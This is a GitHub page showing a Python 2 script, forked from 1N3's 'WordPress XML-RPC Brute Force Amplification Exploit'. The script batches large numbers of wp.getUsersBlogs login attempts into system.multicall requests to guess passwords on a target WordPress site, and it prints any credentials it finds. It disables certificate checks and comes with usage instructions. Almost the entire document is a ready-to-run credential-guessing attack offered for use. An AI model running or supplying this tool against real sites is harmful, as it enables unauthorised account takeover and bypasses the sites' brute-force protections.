forked from 1N3/Wordpress-XMLRPC-Brute-Force-Exploit
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathwordpress-xmlrpc-brute-v1.py
169 lines (146 loc) · 8.07 KB
/
wordpress-xmlrpc-brute-v1.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
#!/usr/bin/python
# Wordpress XML-RPC Brute Force Amplification Exploit by 1N3
# Last Updated: 20160617
# https://crowdshield.com
#
# ABOUT: This exploit launches a brute force amplification attack on target Wordpress sites. Since XMLRPC allows multiple auth calls per request, amplification is possible and standard brute force protection will not block the attack.
#
# USAGE: ./wp-xml-brute http://target.com/xmlrpc.php passwords.txt username
#
import urllib, urllib2, sys, getopt, requests, ssl
from array import *
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
def main(argv):
argc = len(argv)
if argc < 3:
print bcolors.OKBLUE + " __ __ .___ " + bcolors.ENDC
print bcolors.OKBLUE + "/ \ / \ ____ _______ __| _/ ______ _______ ____ ______ ______" + bcolors.ENDC
print bcolors.OKBLUE + "\ \/\/ / / _ \ \_ __ \ / __ | \____ \ \_ __ \ _/ __ \ / ___/ / ___/" + bcolors.ENDC
print bcolors.OKBLUE + " \ / ( <_> ) | | \/ / /_/ | | |_> > | | \/ \ ___/ \___ \ \___ \ " + bcolors.ENDC
print bcolors.OKBLUE + " \__/\ / \____/ |__| \____ | | __/ |__| \___ > /____ > /____ >" + bcolors.ENDC
print bcolors.OKBLUE + " \/ \/ |__| \/ \/ \/ " + bcolors.ENDC
print bcolors.OKBLUE + "" + bcolors.ENDC
print bcolors.OKBLUE + " \ / _ _ __ _ _ ___ __ __ _ _ __ __" + bcolors.ENDC
print bcolors.OKBLUE + " X |V|| |_)|_)/ |_)|_)| | | |_ |_ / \|_)/ |_ " + bcolors.ENDC
print bcolors.OKBLUE + ' / \| ||__| \| \__ |_)| \|_| | |__ | \_/| \\\__|__' + bcolors.ENDC
print bcolors.OKBLUE + "" + bcolors.ENDC
print ""
print bcolors.OKBLUE + "+ -- --=[XML-RPC Brute Force Exploit by 1N3 @ https://crowdshield.com" + bcolors.ENDC
print bcolors.OKBLUE + "+ -- --=[Usage: %s http://wordpress.org/xmlrpc.php passwords.txt username" % (argv[0]) + bcolors.ENDC
sys.exit(0)
url = argv[1] # SET TARGET
wordlist = argv[2] # SET CUSTOM WORDLIST
users = argv[3] # SET USERNAME TO BRUTE FORCE
# users = ['flipkey'] # USERS LIST, ADD MORE AS NEEDED OR CHANGE DEFAULT ADMIN
print bcolors.OKBLUE + "" + bcolors.ENDC
print bcolors.OKBLUE + " __ __ .___ " + bcolors.ENDC
print bcolors.OKBLUE + "/ \ / \ ____ _______ __| _/ ______ _______ ____ ______ ______" + bcolors.ENDC
print bcolors.OKBLUE + "\ \/\/ / / _ \ \_ __ \ / __ | \____ \ \_ __ \ _/ __ \ / ___/ / ___/" + bcolors.ENDC
print bcolors.OKBLUE + " \ / ( <_> ) | | \/ / /_/ | | |_> > | | \/ \ ___/ \___ \ \___ \ " + bcolors.ENDC
print bcolors.OKBLUE + " \__/\ / \____/ |__| \____ | | __/ |__| \___ > /____ > /____ >" + bcolors.ENDC
print bcolors.OKBLUE + " \/ \/ |__| \/ \/ \/ " + bcolors.ENDC
print bcolors.OKBLUE + "" + bcolors.ENDC
print bcolors.OKBLUE + " \ / _ _ __ _ _ ___ __ __ _ _ __ __" + bcolors.ENDC
print bcolors.OKBLUE + " X |V|| |_)|_)/ |_)|_)| | | |_ |_ / \|_)/ |_ " + bcolors.ENDC
print bcolors.OKBLUE + ' / \| ||__| \| \__ |_)| \|_| | |__ | \_/| \\\__|__' + bcolors.ENDC
print bcolors.OKBLUE + "" + bcolors.ENDC
print ""
print bcolors.OKBLUE + "+ -- --=[XML-RPC Brute Force Exploit by 1N3 @ https://crowdshield.com" + bcolors.ENDC
print bcolors.WARNING + "+ -- --=[Brute forcing target: " + url + " with username: " + users + "" + bcolors.ENDC
data1 = '<?xml version="1.0"?><methodCall><methodName>system.multicall</methodName><params><param><value><array><data>'
data2 = ""
data3 = '</data></array></value></param></params></methodCall>'
num_lines = sum(1 for line in open(wordlist))
f = open(wordlist)
lines = f.readlines()
passwds = f.read().splitlines()
f.close()
num = 0 # CURRENT LINE POSITION
count = 0 # HOW MANY AUTHS TO SEND PER REQUEST
while num < num_lines:
# SEND 50 AUTH REQUESTS PER REQUEST
if count < 1000:
num += 1
count += 1
# REACHED END OF FILE, SEND REQUEST AND ATTEMPT BRUTE FORCE...
if num >= num_lines:
data = "" + data1 + "" + data2 + "" + data3
header = 'headers={"Content-Type": "application/xml"}'
req = urllib2.Request(url, data, headers={'Content-Type': 'application/xml'})
rsp = urllib2.urlopen(req,context=ctx)
content = rsp.read()
print content
if "admin" in content.lower():
print bcolors.OKGREEN + "+ -- --=[Brute Force Amplification Attack Successful!" + bcolors.ENDC
print bcolors.WARNING + "+ -- --=[Starting Brute Force Enumeration..." + bcolors.ENDC
for user in users:
while num <= num_lines:
num -= 1
passwd = str(lines[num])
data = '<?xml version="1.0" encoding="UTF-8"?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>' + user + '</value></param><param><value>' + passwd + '</value></param></params></methodCall>'
header = 'headers={"Content-Type": "application/xml"}'
req = urllib2.Request(url, data, headers={'Content-Type': 'application/xml'})
rsp = urllib2.urlopen(req,context=ctx)
content = rsp.read()
print content
if "incorrect" in content.lower():
print bcolors.FAIL + "+ -- --=[Wrong username or password: " + user + "/" + passwd + "" + bcolors.ENDC
elif "admin" in content.lower():
print bcolors.OKGREEN + "+ -- --=[w00t! User found! Wordpress is pwned! " + user + "/" + passwd + "" + bcolors.ENDC
sys.exit(0)
else:
print bcolors.WARNING + "+ -- --=[Invalid response from target" + bcolors.ENDC
sys.exit(0)
else:
print bcolors.FAIL + "+ -- --=[Brute force failed" + bcolors.ENDC
break
sys.exit(0)
else:
passwd = str(lines[num])
for user in users:
data2 += str('<value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><data><value><array><data><value><string>'+user+'</string></value><value><string>'+passwd+'</string></value></data></array></value></data></array></value></member></struct></value>')
# WE'VE REACHED THE LIMIT, SEND THE REQUEST AND RESET COUNTER
else:
count = 0
data = "" + data1 + "" + data2 + "" + data3
header = 'headers={"Content-Type": "application/xml"}'
req = urllib2.Request(url, data, headers={'Content-Type': 'application/xml'})
rsp = urllib2.urlopen(req,context=ctx)
content = rsp.read()
print content
data2 = ""
if "admin" in content.lower():
print bcolors.OKGREEN + "+ -- --=[Brute Force Amplification Attack Successful!" + bcolors.ENDC
print bcolors.WARNING + "+ -- --=[Starting Brute Force Enumeration..." + bcolors.ENDC
for user in users:
while num <= num_lines:
passwd = str(lines[num])
data = '<?xml version="1.0" encoding="UTF-8"?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>' + user + '</value></param><param><value>' + passwd + '</value></param></params></methodCall>'
header = 'headers={"Content-Type": "application/xml"}'
req = urllib2.Request(url, data, headers={'Content-Type': 'application/xml'})
rsp = urllib2.urlopen(req,context=ctx)
content = rsp.read()
num -= 1
print content
if "incorrect" in content.lower():
print bcolors.FAIL + "+ -- --=[Wrong username or password: " + user + "/" + passwd + "" + bcolors.ENDC
elif "admin" in content.lower():
print bcolors.OKGREEN + "+ -- --=[w00t! User found! Wordpress is pwned! " + user + "/" + passwd + "" + bcolors.ENDC
sys.exit(0)
else:
print bcolors.WARNING + "+ -- --=[Invalid response from target" + bcolors.ENDC
sys.exit(0)
else:
print bcolors.FAIL + "+ -- --=[Brute force failed" + bcolors.ENDC
main(sys.argv)